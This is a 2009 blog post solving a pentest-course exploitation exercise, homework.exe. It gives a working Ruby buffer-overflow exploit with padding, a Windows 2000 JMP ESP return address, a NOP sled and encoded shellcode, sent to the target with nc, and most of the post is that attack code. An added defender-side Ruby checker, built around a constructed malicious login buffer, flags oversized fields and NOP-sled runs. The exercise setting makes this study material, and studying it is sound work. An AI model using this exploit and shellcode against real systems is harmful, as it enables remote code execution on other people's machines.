23 Jan 2009
Solution to homework.exe
This is the solution to the homework.exe exercise posted at http://pentest.cryptocity.net/exploitation/. The videos are great, a must watch for anyone who wants to try exploit development. It is just a simple Ruby script; it only works against Windows 2000 SP4 Rollup 1, the only VM I had access to.

exploit.rb

```ruby
#!/usr/bin/env ruby
# -*- coding: binary -*-
# (magic comment added so the "\x.." literals stay raw bytes on Ruby 1.9 and later)
# usage: ./exploit.rb | nc ip homework.exe 1974
require 'socket'

# Address of a JMP ESP instruction on Windows 2000 SP4 Rollup 1, packed little-endian.
JMP_ESP = [0x77F81BE3].pack('V')
NOP = "\x90"
USERNAME = "poly"
PASSWORD = "teknik"

# Encoded shellcode that runs once JMP ESP lands in the NOP sled.
PAYLOAD = "\x33\xc9\xb1\x56\xbb\x79\xaa\x11\x96\xd9\xf6\xd9\x74\x24" +
          "\xf4\x5f\x31\x5f\x10\x03\x5f\x10\x83\xc7\x04\x9b\x5f\xed" +
          "\x7e\xd2\xa0\x0e\x7f\x84\x29\xeb\x4e\x96\x4e\x7f\xe2\x26" +
          "\x04\x2d\x0f\xcd\x48\xc6\x84\xa3\x44\xe9\x2d\x09\xb3\xc4" +
          "\xae\xbc\x7b\x8a\x6d\xdf\x07\xd1\xa1\x3f\x39\x1a\xb4\x3e" +
          "\x7e\x47\x37\x12\xd7\x03\xea\x82\x5c\x51\x37\xa3\xb2\xdd" +
          "\x07\xdb\xb7\x22\xf3\x51\xb9\x72\xac\xee\xf1\x6a\xc6\xa8" +
          "\x21\x8a\x0b\xab\x1e\xc5\x20\x1f\xd4\xd4\xe0\x6e\x15\xe7" +
          "\xcc\x3c\x28\xc7\xc0\x3d\x6c\xe0\x3a\x48\x86\x12\xc6\x4a" +
          "\x5d\x68\x1c\xdf\x40\xca\xd7\x47\xa1\xea\x34\x11\x22\xe0" +
          "\xf1\x56\x6c\xe5\x04\xbb\x06\x11\x8c\x3a\xc9\x93\xd6\x18" +
          "\xcd\xf8\x8d\x01\x54\xa5\x60\x3e\x86\x01\xdc\x9a\xcc\xa0" +
          "\x09\x9c\x8e\xac\xfe\x92\x30\x2d\x69\xa5\x43\x1f\x36\x1d" +
          "\xcc\x13\xbf\xbb\x0b\x53\xea\x7b\x83\xaa\x15\x7b\x8d\x68" +
          "\x41\x2b\xa5\x59\xea\xa0\x35\x65\x3f\x66\x66\xc9\x90\xc6" +
          "\xd6\xa9\x40\xae\x3c\x26\xbe\xce\x3e\xec\xc9\xc9\xf0\xd4" +
          "\x99\xbd\xf0\xea\x0c\x61\x7c\x0c\x44\x89\x28\x86\xf1\x6b" +
          "\x0f\x1f\x65\x94\x65\x33\x3e\x02\x31\x5d\xf8\x2d\xc2\x4b" +
          "\xaa\x82\x6a\x1c\x39\xc8\xae\x3d\x3e\xc5\x86\x34\x06\x8d" +
          "\x5d\x29\xc4\x2c\x61\x60\xbe\xcd\xf0\xef\x3f\x98\xe8\xa7" +
          "\x68\xcd\xdf\xb1\xfd\xe3\x46\x68\xe0\xfe\x1f\x53\xa0\x24" +
          "\xdc\x5a\x28\xa9\x58\x79\x3a\x77\x60\xc5\x6e\x27\x37\x93" +
          "\xd8\x81\xe1\x55\xb3\x5b\x5d\x3c\x53\x1a\xad\xff\x25\x23" +
          "\xf8\x89\xca\x95\x55\xcc\xf5\x19\x32\xd8\x8e\x44\xa2\x27" +
          "\x45\xcd\xc2\xc5\x4c\x3b\x6b\x50\x05\x86\xf6\x63\xf3\xc4" +
          "\x0e\xe0\xf6\xb4\xf4\xf8\x72\xb1\xb1\xbe\x6f\xcb\xaa\x2a" +
          "\x90\x78\xca\x7e\x9a"

# Login line as "user:pass", then 117 bytes of padding up to the saved return
# address, the JMP ESP address, a NOP sled and the shellcode.
boom = USERNAME + ":" + PASSWORD + "A" * 117 + JMP_ESP + NOP * 500 + PAYLOAD + "\r\n"
puts boom + "\r\n"
```
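As an added defender-side example (not from the original post), here is a Ruby check that flags login lines shaped like the buffer built above: an oversized password field, non-printable bytes and a long run of one repeated byte, which is what a NOP sled looks like on the wire. MAX_FIELD and MAX_RUN are constructed thresholds; the real buffer size of homework.exe is not given on the page.

```ruby
# Added example, not from the original post: flag login lines shaped like the
# overflow buffer above. MAX_FIELD and MAX_RUN are constructed limits; the real
# buffer size of homework.exe is not given on the page.
MAX_FIELD = 64
MAX_RUN   = 32   # longest tolerated run of one repeated byte

# Longest run of a single repeated byte in the string.
def longest_run(str)
  best = run = 0
  prev = nil
  str.each_byte do |b|
    run = (b == prev) ? run + 1 : 1
    best = run if run > best
    prev = b
  end
  best
end

# Returns the reasons a "user:pass\r\n" line looks hostile; empty means normal.
def classify_login(line)
  line = line.b.chomp("\r\n")
  user, pass = line.split(":", 2)
  reasons = []
  reasons << "missing ':' separator" if pass.nil?
  reasons << "user field too long (#{user.bytesize} bytes)" if user.bytesize > MAX_FIELD
  reasons << "password field too long (#{pass.bytesize} bytes)" if pass && pass.bytesize > MAX_FIELD
  reasons << "non-printable bytes" if line.bytes.any? { |b| b < 0x20 || b > 0x7e }
  run = longest_run(line)
  reasons << "repeated-byte run of #{run}" if run > MAX_RUN
  reasons
end

# Constructed samples: a normal login and a line with the same layout as `boom`
# (padding, little-endian return address, 0x90 sled, no shellcode).
GOOD_LOGIN = "poly:teknik\r\n"
BAD_LOGIN  = "poly:teknik" + "A" * 117 + "\xE3\x1B\xF8\x77".b + "\x90".b * 500 + "\r\n"

if __FILE__ == $0
  [GOOD_LOGIN, BAD_LOGIN].each do |l|
    r = classify_login(l)
    puts(r.empty? ? "ok: #{l.bytesize} bytes" : "suspicious: #{r.join('; ')}")
  end
end
```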